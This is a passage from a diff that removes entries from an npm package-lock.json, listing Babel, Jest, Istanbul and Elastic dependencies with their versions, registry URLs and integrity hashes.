"^0.3.0", - "@jridgewell/trace-mapping": "^0.3.9" - } - }, - "@babel/code-frame": { - "version": "7.22.13", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.22.13.tgz", - "integrity": "sha512-XktuhWlJ5g+3TJXc5upd9Ks1HutSArik6jf2eAjYFyIOf4ej3RN+184cZbzDvbPnuTJIUhPKKJE3cIsYTiAT3w==", - "dev": true, - "requires": { - "@babel/highlight": "^7.22.13", - "chalk": "^2.4.2" - }, - "dependencies": { - "ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "requires": { - "color-convert": "^1.9.0" - } - }, - "chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "requires": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - } - }, - "color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "requires": { - "color-name": "1.1.3" - } - }, - "color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true - }, - "has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true - }, - "supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "requires": { - "has-flag": "^3.0.0" - } - } - } - }, - "@babel/compat-data": { - "version": "7.22.9", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.22.9.tgz", - "integrity": "sha512-5UamI7xkUcJ3i9qVDS+KFDEK8/7oJ55/sJMB1Ge7IEapr7KfdfV/HErR+koZwOfd+SgtFKOKRhRakdg++DcJpQ==", - "dev": true - }, - "@babel/core": { - "version": "7.22.9", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.22.9.tgz", - "integrity": "sha512-G2EgeufBcYw27U4hhoIwFcgc1XU7TlXJ3mv04oOv1WCuo900U/anZSPzEqNjwdjgffkk2Gs0AN0dW1CKVLcG7w==", - "dev": true, - "requires": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.22.5", - "@babel/generator": "^7.22.9", - "@babel/helper-compilation-targets": "^7.22.9", - "@babel/helper-module-transforms": "^7.22.9", - "@babel/helpers": "^7.22.6", - "@babel/parser": "^7.22.7", - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.8", - "@babel/types": "^7.22.5", - "convert-source-map": "^1.7.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.2", - "semver": "^6.3.1" - }, - "dependencies": { - "convert-source-map": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.9.0.tgz", - "integrity": "sha512-ASFBup0Mz1uyiIjANan1jzLQami9z1PoYSZCiiYW2FczPbenXc45FZdBZLzOT+r6+iciuEModtmCti+hjaAk0A==", - "dev": true - } - } - }, - "@babel/generator": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.23.0.tgz", - "integrity": "sha512-lN85QRR+5IbYrMWM6Y4pE/noaQtg4pNiqeNGX60eqOfo6gtEj6uw/JagelB8vVztSd7R6M5n1+PQkDbHbBRU4g==", - "dev": true, - "requires": { - "@babel/types": "^7.23.0", - "@jridgewell/gen-mapping": "^0.3.2", - "@jridgewell/trace-mapping": "^0.3.17", - "jsesc": "^2.5.1" - } - }, - "@babel/helper-compilation-targets": { - "version": "7.22.9", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.22.9.tgz", - "integrity": "sha512-7qYrNM6HjpnPHJbopxmb8hSPoZ0gsX8IvUS32JGVoy+pU9e5N0nLr1VjJoR6kA4d9dmGLxNYOjeB8sUDal2WMw==", - "dev": true, - "requires": { - "@babel/compat-data": "^7.22.9", - "@babel/helper-validator-option": "^7.22.5", - "browserslist": "^4.21.9", - "lru-cache": "^5.1.1", - "semver": "^6.3.1" - } - }, - "@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", - "dev": true - }, - "@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", - "dev": true, - "requires": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - } - }, - "@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-module-imports": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.22.5.tgz", - "integrity": "sha512-8Dl6+HD/cKifutF5qGd/8ZJi84QeAKh+CEe1sBzz8UayBBGg1dAIJrdHOcOM5b2MpzWL2yuotJTtGjETq0qjXg==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-module-transforms": { - "version": "7.22.9", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.22.9.tgz", - "integrity": "sha512-t+WA2Xn5K+rTeGtC8jCsdAH52bjggG5TKRuRrAGNM/mjIbO4GxvlLMFOEz9wXY5I2XQ60PMFsAG2WIcG82dQMQ==", - "dev": true, - "requires": { - "@babel/helper-environment-visitor": "^7.22.5", - "@babel/helper-module-imports": "^7.22.5", - "@babel/helper-simple-access": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/helper-validator-identifier": "^7.22.5" - } - }, - "@babel/helper-plugin-utils": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.22.5.tgz", - "integrity": "sha512-uLls06UVKgFG9QD4OeFYLEGteMIAa5kpTPcFL28yuCIIzsf6ZyKZMllKVOCZFhiZ5ptnwX4mtKdWCBE/uT4amg==", - "dev": true - }, - "@babel/helper-simple-access": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.22.5.tgz", - "integrity": "sha512-n0H99E/K+Bika3++WNL17POvo4rKWZ7lZEp1Q+fStVbUi8nxPQEBOlTmCOxW/0JsS56SKKQ+ojAe2pHKJHN35w==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-string-parser": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.22.5.tgz", - "integrity": "sha512-mM4COjgZox8U+JcXQwPijIZLElkgEpO5rsERVDJTc2qfCDfERyob6k5WegS14SX18IIjv+XD+GrqNumY5JRCDw==", - "dev": true - }, - "@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", - "dev": true - }, - "@babel/helper-validator-option": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.22.5.tgz", - "integrity": "sha512-R3oB6xlIVKUnxNUxbmgq7pKjxpru24zlimpE8WK47fACIlM0II/Hm1RS8IaOI7NgCr6LNS+jl5l75m20npAziw==", - "dev": true - }, - "@babel/helpers": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.22.6.tgz", - "integrity": "sha512-YjDs6y/fVOYFV8hAf1rxd1QvR9wJe1pDBZ2AREKq/SDayfPzgk0PBnVuTCE5X1acEpMMNOVUqoe+OwiZGJ+OaA==", - "dev": true, - "requires": { - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.6", - "@babel/types": "^7.22.5" - } - }, - "@babel/highlight": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.22.20.tgz", - "integrity": "sha512-dkdMCN3py0+ksCgYmGG8jKeGA/8Tk+gJwSYYlFGxG5lmhfKNoAy004YpLxpS1W2J8m/EK2Ew+yOs9pVRwO89mg==", - "dev": true, - "requires": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "requires": { - "color-convert": "^1.9.0" - } - }, - "chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "requires": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - } - }, - "color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "requires": { - "color-name": "1.1.3" - } - }, - "color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true - }, - "has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true - }, - "supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "requires": { - "has-flag": "^3.0.0" - } - } - } - }, - "@babel/parser": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.23.0.tgz", - "integrity": "sha512-vvPKKdMemU85V9WE/l5wZEmImpCtLqbnTvqDS2U1fJ96KrxoW7KrXhNsNCblQlg8Ck4b85yxdTyelsMUgFUXiw==", - "dev": true - }, - "@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.12.13" - } - }, - "@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-jsx": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.22.5.tgz", - "integrity": "sha512-gvyP4hZrgrs/wWMaocvxZ44Hw0b3W8Pe+cMxc8V1ULQ07oh8VNbIRaoD1LRZVTvD+0nieDKjfgKg89sD7rrKrg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.22.5" - } - }, - "@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.14.5" - } - }, - "@babel/plugin-syntax-typescript": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.22.5.tgz", - "integrity": "sha512-1mS2o03i7t1c6VzH6fdQ3OA8tcEIxwG18zIPRp+UY1Ihv6W+XZzBCVxExF9upussPXJ0xE9XRHwMoNs1ep/nRQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.22.5" - } - }, - "@babel/template": { - "version": "7.22.15", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.22.15.tgz", - "integrity": "sha512-QPErUVm4uyJa60rkI73qneDacvdvzxshT3kksGqlGWYdOTIUOwJ7RDUL8sGqslY1uXWSL6xMFKEXDS3ox2uF0w==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.22.13", - "@babel/parser": "^7.22.15", - "@babel/types": "^7.22.15" - } - }, - "@babel/traverse": { - "version": "7.23.2", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.23.2.tgz", - "integrity": "sha512-azpe59SQ48qG6nu2CzcMLbxUudtN+dOM9kDbUqGq3HXUJRlo7i8fvPoxQUzYgLZ4cMVmuZgm8vvBpNeRhd6XSw==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.22.13", - "@babel/generator": "^7.23.0", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.23.0", - "@babel/types": "^7.23.0", - "debug": "^4.1.0", - "globals": "^11.1.0" - } - }, - "@babel/types": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.23.0.tgz", - "integrity": "sha512-0oIyUfKoI3mSqMvsxBdclDwxXKXAUA8v/apZbc+iSyARYou1o8ZGDxbUYyLFoW2arqS2jDGqJuZvv1d/io1axg==", - "dev": true, - "requires": { - "@babel/helper-string-parser": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" - } - }, - "@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "@elastic/elasticsearch": { - "version": "8.18.2", - "resolved": "https://registry.npmjs.org/@elastic/elasticsearch/-/elasticsearch-8.18.2.tgz", - "integrity": "sha512-2pOc/hGdxkbaDavfAlnUfjJdVsFRCGqg7fpsWJfJ2UzpgViIyojdViHg8zOCT1J14lAwvDgb9CNETWa3SBZRfw==", - "requires": { - "@elastic/transport": "^8.9.6", - "apache-arrow": "18.x - 19.x", - "tslib": "^2.4.0" - } - }, - "@elastic/transport": { - "version": "8.9.6", - "resolved": "https://registry.npmjs.org/@elastic/transport/-/transport-8.9.6.tgz", - "integrity": "sha512-v71jgmZtgPg2ouXF5KTPxU1a6z7YYc8nazAS7jLySteC/vrShs1OJh6oEEeo5oDc19MYUofV/JV1h5vqJVBXOw==", - "requires": { - "@opentelemetry/api": "1.x", - "debug": "^4.4.0", - "hpagent": "^1.2.0", - "ms": "^2.1.3", - "secure-json-parse": "^3.0.1", - "tslib": "^2.8.1", - "undici": "^6.21.1" - } - }, - "@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "requires": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - } - }, - "@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true - }, - "@jest/console": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.6.1.tgz", - "integrity": "sha512-Aj772AYgwTSr5w8qnyoJ0eDYvN6bMsH3ORH1ivMotrInHLKdUz6BDlaEXHdM6kODaBIkNIyQGzsMvRdOv7VG7Q==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0" - } - }, - "@jest/core": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.6.1.tgz", - "integrity": "sha512-CcowHypRSm5oYQ1obz1wfvkjZZ2qoQlrKKvlfPwh5jUXVU12TWr2qMeH8chLMuTFzHh5a1g2yaqlqDICbr+ukQ==", - "dev": true, - "requires": { - "@jest/console": "^29.6.1", - "@jest/reporters": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.5.0", - "jest-config": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-resolve-dependencies": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "jest-watcher": "^29.6.1", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - } - }, - "@jest/environment": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.6.1.tgz", - "integrity": "sha512-RMMXx4ws+Gbvw3DfLSuo2cfQlK7IwGbpuEWXCqyYDcqYTI+9Ju3a5hDnXaxjNsa6uKh9PQF2v+qg+RLe63tz5A==", - "dev": true, - "requires": { - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1" - } - }, - "@jest/expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-N5xlPrAYaRNyFgVf2s9Uyyvr795jnB6rObuPx4QFvNJz8aAjpZUDfO4bh5G/xuplMID8PrnuF1+SfSyDxhsgYg==", - "dev": true, - "requires": { - "expect": "^29.6.1", - "jest-snapshot": "^29.6.1" - } - }, - "@jest/expect-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.6.1.tgz", - "integrity": "sha512-o319vIf5pEMx0LmzSxxkYYxo4wrRLKHq9dP1yJU7FoPTB0LfAKSz8SWD6D/6U3v/O52t9cF5t+MeJiRsfk7zMw==", - "dev": true, - "requires": { - "jest-get-type": "^29.4.3" - } - }, - "@jest/fake-timers": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.6.1.tgz", - "integrity": "sha512-RdgHgbXyosCDMVYmj7lLpUwXA4c69vcNzhrt69dJJdf8azUrpRh3ckFCaTPNjsEeRi27Cig0oKDGxy5j7hOgHg==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - } - }, - "@jest/globals": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.6.1.tgz", - "integrity": "sha512-2VjpaGy78JY9n9370H8zGRCFbYVWwjY6RdDMhoJHa1sYfwe6XM/azGN0SjY8kk7BOZApIejQ1BFPyH7FPG0w3A==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/types": "^29.6.1", - "jest-mock": "^29.6.1" - } - }, - "@jest/reporters": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.6.1.tgz", - "integrity": "sha512-9zuaI9QKr9JnoZtFQlw4GREQbxgmNYXU6QuWtmuODvk5nvPUeBYapVR/VYMyi2WSx3jXTLJTJji8rN6+Cm4+FA==", - "dev": true, - "requires": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^5.1.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - } - }, - "@jest/schemas": { - "version": "29.6.0", - 